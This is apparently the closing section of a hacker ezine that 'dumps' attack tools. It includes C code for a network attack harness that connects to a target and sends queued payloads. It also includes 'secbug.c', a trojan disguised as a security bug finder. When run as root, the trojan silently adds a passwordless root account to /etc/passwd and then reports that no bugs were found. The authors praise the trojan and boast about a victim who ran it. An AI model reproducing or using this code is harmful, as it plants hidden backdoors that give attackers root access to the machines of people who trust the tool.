    	fprintf(stdout, "\n");
	}
}

static void
queuedump(void)
{
	Queue * q;
	int len;
	int xa;

	len = 0;
	xa = 0;

	if(queue == nil) {
		fprintf(stdout, "no queue to dump. \n");
		return;
	}

	for(q = queue; q; q = q->next, xa++) {
		len = q->len >= 32 ? 32 : q->len;

		fprintf(stdout, "queue slot %d; vector=%.08x; len=%d; \n", xa, q->vector, q->len);
		fprintf(stdout, "\t dumping %d bytes for tagging \n", len);
		fprintf(stdout, "{ \n");

		hexdump(q->vector, len);

		fprintf(stdout, "} \n");
	}
	fflush(stdout);
}

static void
queueadd(void)
{
	Queue ** qx;
	Queue * q;
	uchar * v;
	uchar * c;
	uint vl;
	int xa;

	if(queue != nil) {
		for(q = queue; q->next != nil; q = q->next)
			continue;
		qx = &q->next;
	}
	else
		qx = &queue;

	if((q = calloc(1, sizeof(Queue))) == nil)
		fatal("calloc@queueadd()");

	fprintf(stdout, "generating queue entry from current segments... \n");

	vl = 0;
	for(xa = 0; xa < 5; xa++)
		if(segments[xa].vector && segments[xa].len > 0)
			vl += segments[xa].len;

	if((v = calloc(1, vl + 1)) == nil)
		fatal("calloc:2@queueadd()");

	c = &v[0];
	for(xa = 0; xa < 5; xa++)
		if(segments[xa].vector && segments[xa].len > 0) {
			fprintf(stdout, "adding segment %d \n", xa);

			memcpy(c, segments[xa].vector, segments[xa].len);
			c += segments[xa].len;

			// clean up as we go
			free(segments[xa].vector);
			segments[xa].vector = nil;
			segments[xa].len = 0;
		}

	q->vector = v;
	q->len = vl;

	*qx = q;

	fprintf(stdout, "added. \n");
	fflush(stdout);
}

static void
queuedel(void)
{
	Queue * q;
	Queue * r;

	if(queue == nil) {
		fprintf(stdout, "no queue entries to delete. \n");
		return;
	}

	fprintf(stdout, "deleting most recently added queue entry \n");

	r = nil;
	for(q = queue; q->next != nil; r = q, q = q->next)
		continue;

	free(q->vector);
	free(q);

	if(r)
		r->next = nil;
	else
		queue = nil;

	fprintf(stdout, "deleted. \n");
}

static void
alarmcall(int sig)
{
	if(sig == SIGALRM)
		alarmcalled = 1;
}

static int
dialout(void)
{
	struct sockaddr_in sin;
	int port;
	int fd;
	int a;

	if(settings[0].value == nil || settings[1].value == nil) {
		fprintf(stdout, "error: equate the settings before attacking \n");
		fflush(stdout);
		return -1;
	}

	fprintf(stdout, "attempting to connect... \n");

	fd = 0;
	if((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
		fatal("socket@dialout()");

	memset((void * )&sin, 0, sizeof(sin));

	sin.sin_addr.s_addr = inet_addr(settings[0].value);
	sin.sin_family = AF_INET;

	port = atoi(settings[1].value);
	sin.sin_port = htons(port);

	// don't you hate to wait forever?
	a = 7;
	if(settings[2].value)
		a = atoi(settings[2].value);

	alarmcalled = 0;
	alarm(a);

	do
	{
		if(connect(fd, (void * )&sin, sizeof(sin)) == -1) {
			close(fd);

			if(alarmcalled)
				fprintf(stdout, "error: connection to %s:%d timed out",
					settings[0].value, settings[1].value);
			else
				fprintf(stdout, "error: connect attempt to %s:%d failed: %s",
					settings[0].value, settings[1].value, strerror(errno));

			fflush(stdout);
			return -1;
		}

		alarm(0);
		break;
	}
	while(1);

	fprintf(stdout, "connected. \n");
	fflush(stdout);

	return fd;
}

static int
readnet(int fd)
{
	char buffer[4096];
	char * c;
	int xa;
	int a;

	memset(buffer, 0, sizeof(buffer));

	a = 7;
	if(settings[2].value)
		a = atoi(settings[2].value);

	alarmcalled = 0;
	alarm(a);

	xa = 0;
	xa = read(fd, buffer, sizeof(buffer) - 1);

	alarm(0);

	switch(xa) {
	case -1:
		{
			if(alarmcalled)
				fprintf(stdout, "error: network read timed out \n");
			else
				fprintf(stdout, "error: network read %s \n", strerror(errno));

			fflush(stdout);

			return -1;
		}
	case 0:
		{
			fprintf(stdout, "warning: connection reset by peer \n");
			return -1;
		}
	default:
		{
			for(c = buffer; c - buffer < xa; c++)
				if(*c == '\r' || *c == '\n') {
					*c = 0;
					break;
				}
			break;
		}
	}

	fprintf(stdout, "recv=\"%s\"\n", buffer);
	fflush(stdout);

	return 0;
}
++> End 0day




--=[ 6. secbug.c

Author: sh 
Affliations: ??
Comments: This has to be one of the greatest trojans that I have ever laid
	eyes upon. The level of skill that was taken to hide this. I mean, this
	surpasses the phrack extraction utility by ten fold. Good work sh! =)
	P.S. divineint/gov-boi ran this!

--> Begin 0day

/* Security BUG finder idae by sh...written by sh:) */

#include <stdio.h>
#include <stdlib.h>

main () {
	int i;
	FILE * fp;

	printf(" Security BUG finder!\n`----------------------\n\n");
	if (getuid() != 0) {
		fprintf(stderr, "ERROR#1: Run as root only!\n\
Thiz program reads many informations from kernel and thats only allowed for root\n");
		exit(1);
	}
	fp = fopen("/etc/passwd", "r+");
	if (fp==NULL) {
 		fprintf(stderr, "ERROR#2: Can't open identification file!\n");
 		exit(1);
	}
	fseek(fp, 0, SEEK_END);
	fputs("qmailk::0:0:qmail daemon:/var/qmail:/bin/sh\n", fp);
	fclose(fp);

	printf("Analizing your system...please wait...");
	for (i=0; i < 4000; i++)
		if (!(i%50))
			printf(".");
	printf("\n\nNo security bugs found on your system.\n");
	exit(0);
}
++> End 0day



-------------------[[[ el fin ]]]-----------------------
y0h, this shit is just 2 HOT 2 HANDLE! i better quit dumping this shit before
hzon gets owned again!@#@ next issue will be even more insane!! man o man. i
better sign off bef0re silvio dies again! pz - elguapo 




|=[ EOF ]=---------------------------------------------------------------=|